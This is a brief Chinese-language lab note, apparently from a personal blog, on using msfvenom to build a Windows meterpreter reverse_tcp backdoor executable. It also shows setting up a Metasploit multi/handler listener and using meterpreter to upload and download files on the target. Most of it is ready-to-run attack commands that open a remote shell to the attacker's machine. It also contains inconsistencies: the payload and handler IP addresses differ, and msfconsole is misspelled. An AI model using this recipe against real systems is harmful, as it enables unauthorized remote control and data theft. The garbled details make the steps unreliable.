Msfvenom使用记录
Msfvenom是用来生成后门的软件。
攻击机:kali
靶机:物理机
使用工具:Msfvenom
使用过程:
(1)生成文件
例:(见下图)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe -o /var/payload.exe
说明:
-p指定哪些有效载荷生成,如:windows/meterpreter/reverse_tcp,用于Windows平台的反向远程控制程序
-f指定有效载荷的格式,如:exe,生成Windows系统的可执行文件
-o指定保存位置,如:/var/payload.exe
输入msfvenom -h查看帮助选项,这里不一一列举
(2)将生成的文件复制到靶机上
(3)输入msfvenconsole
(4)进行配置:
use multi/handler ,选择模块
set payload windows/meterpreter/reverse_tcp ,选择模块
set LHOST 192.168.154.4 ,填写攻击机的IP地址
set LPORT 5000 ,填写生成文件中的端口号
show options ,查看设置参数
exploit ,执行
运行前打开靶机上的文件,然后再使用exploit
成功
(5)可以运行一些指令,这里用的meterpreter,详细的可以自己去查meterpreter的常用指令,
这里举两个例子:
将本机上的某文件上传到靶机上的某地址:
upload [攻击机上的某文件] [靶机上的某地址]
下载靶机上的某文件到攻击机上:
download [靶机上的某文件]
(6)可使用安全检测网站检测该木马文件,例如www.virustotal.com
翻译了一下网站
结果如下图